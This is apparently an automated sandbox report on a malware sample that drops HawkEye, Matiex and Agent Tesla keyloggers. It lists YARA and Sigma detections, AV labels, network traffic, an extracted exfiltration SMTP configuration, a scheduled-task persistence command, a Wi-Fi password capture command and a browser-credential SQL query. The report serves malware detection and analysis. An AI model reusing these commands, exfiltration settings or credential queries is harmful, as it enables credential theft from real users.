10.2.Pictures.exe.150000.0.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7bf90:$hawkstr1: HawkEye Keylogger 0x7cdd1:$hawkstr1: HawkEye Keylogger 0x7d100:$hawkstr1: HawkEye Keylogger 0x7d25b:$hawkstr1: HawkEye Keylogger 0x7d3be:$hawkstr1: HawkEye Keylogger 0x7d637:$hawkstr1: HawkEye Keylogger 0x7bb1e:$hawkstr2: Dear HawkEye Customers! 0x7d153:$hawkstr2: Dear HawkEye Customers! 0x7d2aa:$hawkstr2: Dear HawkEye Customers! 0x7d411:$hawkstr2: Dear HawkEye Customers! 0x7bc3f:$hawkstr3: HawkEye Logger Details:
20.2.vbc.exe.400000.0.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
9.0.LOGO AND PICTURES.exe.db0000.0.unpack	JoeSecurity_Matiex	Yara detected Matiex Keylogger	Joe Security
9.2.LOGO AND PICTURES.exe.db0000.0.unpack	JoeSecurity_Matiex	Yara detected Matiex Keylogger	Joe Security
8.2.B6LNCKjOGt5EmFQ.exe.400000.0.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0xed439:$key: HawkEyeKeylogger 0xef67d:$salt: 099u787978786 0xeda7a:$string1: HawkEye_Keylogger 0xee8cd:$string1: HawkEye_Keylogger 0xef5dd:$string1: HawkEye_Keylogger 0xede63:$string2: holdermail.txt 0xede83:$string2: holdermail.txt 0xedda5:$string3: wallet.dat 0xeddbd:$string3: wallet.dat 0xeddd3:$string3: wallet.dat 0xef1a1:$string4: Keylog Records 0xef4b9:$string4: Keylog Records 0xef6d5:$string5: do not script --> 0xed421:$string6: \pidloc.txt 0xed4af:$string7: BSPLIT 0xed4bf:$string7: BSPLIT
8.2.B6LNCKjOGt5EmFQ.exe.400000.0.unpack	JoeSecurity_Matiex	Yara detected Matiex Keylogger	Joe Security
8.2.B6LNCKjOGt5EmFQ.exe.400000.0.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
8.2.B6LNCKjOGt5EmFQ.exe.400000.0.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
8.2.B6LNCKjOGt5EmFQ.exe.400000.0.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
8.2.B6LNCKjOGt5EmFQ.exe.400000.0.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0xedad2:$hawkstr1: HawkEye Keylogger 0xee913:$hawkstr1: HawkEye Keylogger 0xeec42:$hawkstr1: HawkEye Keylogger 0xeed9d:$hawkstr1: HawkEye Keylogger 0xeef00:$hawkstr1: HawkEye Keylogger 0xef179:$hawkstr1: HawkEye Keylogger 0xed660:$hawkstr2: Dear HawkEye Customers! 0xeec95:$hawkstr2: Dear HawkEye Customers! 0xeedec:$hawkstr2: Dear HawkEye Customers! 0xeef53:$hawkstr2: Dear HawkEye Customers! 0xed781:$hawkstr3: HawkEye Logger Details:
Click to see the 20 entries

Sigma Overview

System Summary:

Sigma detected: Capture Wi-Fi password

Show sources

Source: Process started

Author: Joe Security: Data: Command: 'netsh' wlan show profile, CommandLine: 'netsh' wlan show profile, CommandLine|base64offset|contains: V, Image: C:\Windows\SysWOW64\netsh.exe, NewProcessName: C:\Windows\SysWOW64\netsh.exe, OriginalFileName: C:\Windows\SysWOW64\netsh.exe, ParentCommandLine: 'C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe' 0, ParentImage: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe, ParentProcessId: 6208, ProcessCommandLine: 'netsh' wlan show profile, ProcessId: 6184

Sigma detected: Scheduled temp file as task from temp location

Show sources

Source: Process started

Author: Joe Security: Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\TcVfsyyjYuQ' /XML 'C:\Users\user\AppData\Local\Temp\tmpDAC4.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\TcVfsyyjYuQ' /XML 'C:\Users\user\AppData\Local\Temp\tmpDAC4.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe' , ParentImage: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe, ParentProcessId: 6076, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\TcVfsyyjYuQ' /XML 'C:\Users\user\AppData\Local\Temp\tmpDAC4.tmp', ProcessId: 4812

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Avira: detection malicious, Label: TR/Spy.Gen8
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Avira: detection malicious, Label: TR/Redcap.jajcu
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Avira: detection malicious, Label: TR/AD.MExecute.lzrac
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Avira: detection malicious, Label: SPR/Tool.MailPassView.473
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Avira: detection malicious, Label: TR/Spy.Gen8

Found malware configuration

Show sources

Source: Pictures.exe.6240.10.memstr	Malware Configuration Extractor: HawkEye {"Modules": ["WebBrowserPassView", "mailpv", "Mail PassView"], "Version": ""}
Source: LOGO AND PICTURES.exe.6208.9.memstr	Malware Configuration Extractor: Agenttesla {"Username: ": "", "URL: ": "", "To: ": "sales01@seedwellresources.xyz", "ByHost: ": "smtp.privateemail.com:5874", "Password: ": "", "From: ": "sales01@seedwellresources.xyz"}

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\TcVfsyyjYuQ.exe

ReversingLabs: Detection: 26%

Multi AV Scanner detection for submitted file

Show sources

Source: B6LNCKjOGt5EmFQ.exe

ReversingLabs: Detection: 26%

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\TcVfsyyjYuQ.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Show sources

Source: B6LNCKjOGt5EmFQ.exe

Joe Sandbox ML: detected

Source: 8.2.B6LNCKjOGt5EmFQ.exe.400000.0.unpack	Avira: Label: TR/Redcap.jajcu
Source: 8.2.B6LNCKjOGt5EmFQ.exe.400000.0.unpack	Avira: Label: TR/AD.MExecute.lzrac
Source: 8.2.B6LNCKjOGt5EmFQ.exe.400000.0.unpack	Avira: Label: SPR/Tool.MailPassView.473
Source: 8.2.B6LNCKjOGt5EmFQ.exe.400000.0.unpack	Avira: Label: TR/Spy.Gen8
Source: 10.0.Pictures.exe.150000.0.unpack	Avira: Label: TR/AD.MExecute.lzrac
Source: 10.0.Pictures.exe.150000.0.unpack	Avira: Label: SPR/Tool.MailPassView.473
Source: 10.2.Pictures.exe.150000.0.unpack	Avira: Label: TR/AD.MExecute.lzrac
Source: 10.2.Pictures.exe.150000.0.unpack	Avira: Label: SPR/Tool.MailPassView.473
Source: 9.0.LOGO AND PICTURES.exe.db0000.0.unpack	Avira: Label: TR/Redcap.jajcu
Source: 9.2.LOGO AND PICTURES.exe.db0000.0.unpack	Avira: Label: TR/Redcap.jajcu

Source: B6LNCKjOGt5EmFQ.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: unknown

HTTPS traffic detected: 172.67.188.154:443 -> 192.168.2.3:49739 version: TLS 1.0

Source: C:\Users\user\AppData\Local\Temp\Pictures.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll

Jump to behavior

Source: B6LNCKjOGt5EmFQ.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: \??\C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: Pictures.exe, 0000000A.00000002.325931485.000000000093D000.00000004.00000020.sdmp
Source:	Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.293576161.0000000004C48000.00000004.00000001.sdmp, B6LNCKjOGt5EmFQ.exe, 00000008.00000003.281411863.0000000004450000.00000004.00000001.sdmp, Pictures.exe
Source:	Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.293576161.0000000004C48000.00000004.00000001.sdmp, B6LNCKjOGt5EmFQ.exe, 00000008.00000003.281411863.0000000004450000.00000004.00000001.sdmp, Pictures.exe
Source:	Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.293576161.0000000004C48000.00000004.00000001.sdmp, B6LNCKjOGt5EmFQ.exe, 00000008.00000003.281411863.0000000004450000.00000004.00000001.sdmp, Pictures.exe
Source:	Binary string: D:\Before FprmT\Document VB project\FireFox Stub\FireFox Stub\obj\Debug\VNXT.pdb source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.293576161.0000000004C48000.00000004.00000001.sdmp, B6LNCKjOGt5EmFQ.exe, 00000008.00000003.277852049.0000000003760000.00000004.00000001.sdmp, LOGO AND PICTURES.exe
Source:	Binary string: D:\Before FprmT\Document VB project\FireFox Stub\FireFox Stub\obj\Debug\VNXT.pdbh} source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.293576161.0000000004C48000.00000004.00000001.sdmp, B6LNCKjOGt5EmFQ.exe, 00000008.00000003.277852049.0000000003760000.00000004.00000001.sdmp, LOGO AND PICTURES.exe, 00000009.00000002.604546258.0000000000DB2000.00000002.00020000.sdmp

Source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.293576161.0000000004C48000.00000004.00000001.sdmp	Binary or memory string: autorun.inf
Source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.293576161.0000000004C48000.00000004.00000001.sdmp	Binary or memory string: [autorun]
Source: B6LNCKjOGt5EmFQ.exe, 00000008.00000003.281411863.0000000004450000.00000004.00000001.sdmp	Binary or memory string: autorun.inf
Source: B6LNCKjOGt5EmFQ.exe, 00000008.00000003.281411863.0000000004450000.00000004.00000001.sdmp	Binary or memory string: [autorun]
Source: Pictures.exe	Binary or memory string: autorun.inf
Source: Pictures.exe	Binary or memory string: [autorun]

Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Code function: 4x nop then lea esp, dword ptr [ebp-0Ch]	10_2_00C914C0
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Code function: 4x nop then lea esp, dword ptr [ebp-0Ch]	10_2_00C917F8
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Code function: 4x nop then lea esp, dword ptr [ebp-0Ch]	10_2_00C90728
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Code function: 4x nop then mov esp, ebp	10_2_00C94830
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Code function: 4x nop then jmp 00C91A73h	10_2_00C919A0
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Code function: 4x nop then jmp 00C91A73h	10_2_00C919B0
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Code function: 4x nop then lea esp, dword ptr [ebp-0Ch]	10_2_00C95B70

Networking:

May check the online IP address of the machine

Show sources

Source: unknown	DNS query: name: whatismyipaddress.com
Source: unknown	DNS query: name: whatismyipaddress.com
Source: unknown	DNS query: name: whatismyipaddress.com
Source: unknown	DNS query: name: whatismyipaddress.com
Source: unknown	DNS query: name: whatismyipaddress.com
Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: checkip.dyndns.org

Source: global traffic

TCP traffic: 192.168.2.3:49738 -> 199.193.7.228:587

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 104.16.154.36 104.16.154.36
Source: Joe Sandbox View	IP Address: 131.186.161.70 131.186.161.70

Source: Joe Sandbox View

JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad

Source: global traffic

TCP traffic: 192.168.2.3:49738 -> 199.193.7.228:587

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: unknown

HTTPS traffic detected: 172.67.188.154:443 -> 192.168.2.3:49739 version: TLS 1.0

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.293576161.0000000004C48000.00000004.00000001.sdmp, B6LNCKjOGt5EmFQ.exe, 00000008.00000003.281411863.0000000004450000.00000004.00000001.sdmp	String found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.293576161.0000000004C48000.00000004.00000001.sdmp, B6LNCKjOGt5EmFQ.exe, 00000008.00000003.281411863.0000000004450000.00000004.00000001.sdmp	String found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: Pictures.exe	String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)

Source: unknown

DNS traffic detected: queries for: 94.197.2.0.in-addr.arpa

Source: LOGO AND PICTURES.exe, 00000009.00000002.609664238.00000000015DB000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
Source: LOGO AND PICTURES.exe, 00000009.00000002.611647538.0000000003261000.00000004.00000001.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: LOGO AND PICTURES.exe, 00000009.00000002.611647538.0000000003261000.00000004.00000001.sdmp	String found in binary or memory: http://checkip.dyndns.org/HB
Source: LOGO AND PICTURES.exe, 00000009.00000003.425343136.0000000006AAC000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: LOGO AND PICTURES.exe, 00000009.00000003.425343136.0000000006AAC000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.293576161.0000000004C48000.00000004.00000001.sdmp, B6LNCKjOGt5EmFQ.exe, 00000008.00000003.281411863.0000000004450000.00000004.00000001.sdmp, B6LNCKjOGt5EmFQ.exe, 00000008.00000003.277852049.0000000003760000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
Source: LOGO AND PICTURES.exe, 00000009.00000003.459012991.0000000006ADF000.00000004.00000001.sdmp	String found in binary or memory: http://crl.usertrusts
Source: LOGO AND PICTURES.exe, 00000009.00000002.609664238.00000000015DB000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
Source: LOGO AND PICTURES.exe, 00000009.00000002.609664238.00000000015DB000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
Source: LOGO AND PICTURES.exe, 00000009.00000002.609664238.00000000015DB000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0L
Source: LOGO AND PICTURES.exe, 00000009.00000003.425343136.0000000006AAC000.00000004.00000001.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
Source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.312118405.0000000006640000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: LOGO AND PICTURES.exe, 00000009.00000003.583245849.00000000092C1000.00000004.00000001.sdmp	String found in binary or memory: http://ns.ado/1
Source: LOGO AND PICTURES.exe, 00000009.00000003.583245849.00000000092C1000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adobe.c/g
Source: LOGO AND PICTURES.exe, 00000009.00000003.583245849.00000000092C1000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adobe.cobj
Source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.293576161.0000000004C48000.00000004.00000001.sdmp, B6LNCKjOGt5EmFQ.exe, 00000008.00000003.281411863.0000000004450000.00000004.00000001.sdmp, LOGO AND PICTURES.exe, 00000009.00000003.425343136.0000000006AAC000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: LOGO AND PICTURES.exe, 00000009.00000002.609664238.00000000015DB000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: LOGO AND PICTURES.exe, 00000009.00000002.609664238.00000000015DB000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: LOGO AND PICTURES.exe, 00000009.00000003.425343136.0000000006AAC000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.280326164.0000000003651000.00000004.00000001.sdmp, LOGO AND PICTURES.exe, 00000009.00000002.611647538.0000000003261000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: LOGO AND PICTURES.exe, 00000009.00000002.614076620.000000000348A000.00000004.00000001.sdmp	String found in binary or memory: http://smtp.privateemail.com
Source: Pictures.exe	String found in binary or memory: http://whatismyipaddress.com/
Source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.293576161.0000000004C48000.00000004.00000001.sdmp, B6LNCKjOGt5EmFQ.exe, 00000008.00000003.281411863.0000000004450000.00000004.00000001.sdmp	String found in binary or memory: http://whatismyipaddress.com/-
Source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.312118405.0000000006640000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: B6LNCKjOGt5EmFQ.exe, 00000000.00000003.226742441.0000000001CAB000.00000004.00000001.sdmp	String found in binary or memory: http://www.ascendercorp.com/typedesigners.html
Source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.312118405.0000000006640000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.312118405.0000000006640000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.312118405.0000000006640000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.312118405.0000000006640000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.312118405.0000000006640000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.312118405.0000000006640000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.312118405.0000000006640000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.312118405.0000000006640000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.312118405.0000000006640000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.312118405.0000000006640000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.312118405.0000000006640000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.312118405.0000000006640000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.312118405.0000000006640000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.312118405.0000000006640000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.312118405.0000000006640000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.312118405.0000000006640000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.312118405.0000000006640000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: B6LNCKjOGt5EmFQ.exe, 00000008.00000003.281411863.0000000004450000.00000004.00000001.sdmp, B6LNCKjOGt5EmFQ.exe, 00000008.00000003.277852049.0000000003760000.00000004.00000001.sdmp, Pictures.exe	String found in binary or memory: http://www.nirsoft.net/
Source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.312118405.0000000006640000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.312118405.0000000006640000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.312118405.0000000006640000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.312118405.0000000006640000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.312118405.0000000006640000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.312118405.0000000006640000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.312118405.0000000006640000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: LOGO AND PICTURES.exe, 00000009.00000002.611647538.0000000003261000.00000004.00000001.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=Createutf-8Win32_ComputerSystemModelManufactu
Source: LOGO AND PICTURES.exe, 00000009.00000002.611704602.0000000003299000.00000004.00000001.sdmp	String found in binary or memory: https://freegeoip.app
Source: LOGO AND PICTURES.exe, 00000009.00000002.611704602.0000000003299000.00000004.00000001.sdmp	String found in binary or memory: https://freegeoip.app/xml/
Source: LOGO AND PICTURES.exe, 00000009.00000002.611704602.0000000003299000.00000004.00000001.sdmp	String found in binary or memory: https://freegeoip.app/xml/84.17.52.74
Source: LOGO AND PICTURES.exe, 00000009.00000002.611647538.0000000003261000.00000004.00000001.sdmp	String found in binary or memory: https://freegeoip.app/xml/LoadTimeZoneCountryNameCountryCodehttps://www.geodatatool.com/en/?ip=/
Source: LOGO AND PICTURES.exe, 00000009.00000002.611647538.0000000003261000.00000004.00000001.sdmp	String found in binary or memory: https://i.imgur.com/GJD7Q5y.png195.239.51.11795.26.248.2989.208.29.13389.187.165.4792.118.13.1895.26
Source: Pictures.exe	String found in binary or memory: https://login.yahoo.com/config/login
Source: LOGO AND PICTURES.exe, 00000009.00000002.611843586.00000000032C9000.00000004.00000001.sdmp, LOGO AND PICTURES.exe, 00000009.00000002.611791578.00000000032B4000.00000004.00000001.sdmp	String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: LOGO AND PICTURES.exe, 00000009.00000003.425343136.0000000006AAC000.00000004.00000001.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: LOGO AND PICTURES.exe, 00000009.00000002.609664238.00000000015DB000.00000004.00000001.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: LOGO AND PICTURES.exe, 00000009.00000002.611843586.00000000032C9000.00000004.00000001.sdmp	String found in binary or memory: https://www.geodatatool.com/en/?ip=
Source: LOGO AND PICTURES.exe, 00000009.00000002.615373407.0000000003515000.00000004.00000001.sdmp	String found in binary or memory: https://www.geodatatool.com/en/?ip=3D84.17.52.74=0D=0A=
Source: LOGO AND PICTURES.exe, 00000009.00000002.612629984.00000000033B7000.00000004.00000001.sdmp	String found in binary or memory: https://www.geodatatool.com/en/?ip=3D84.17.52.74=0D=0A=0D=0ADat=
Source: LOGO AND PICTURES.exe, 00000009.00000002.611843586.00000000032C9000.00000004.00000001.sdmp	String found in binary or memory: https://www.geodatatool.com/en/?ip=84.17.52.74
Source: Pictures.exe	String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.293576161.0000000004C48000.00000004.00000001.sdmp, B6LNCKjOGt5EmFQ.exe, 00000008.00000003.291239624.0000000004451000.00000004.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected HawkEye Keylogger

Show sources

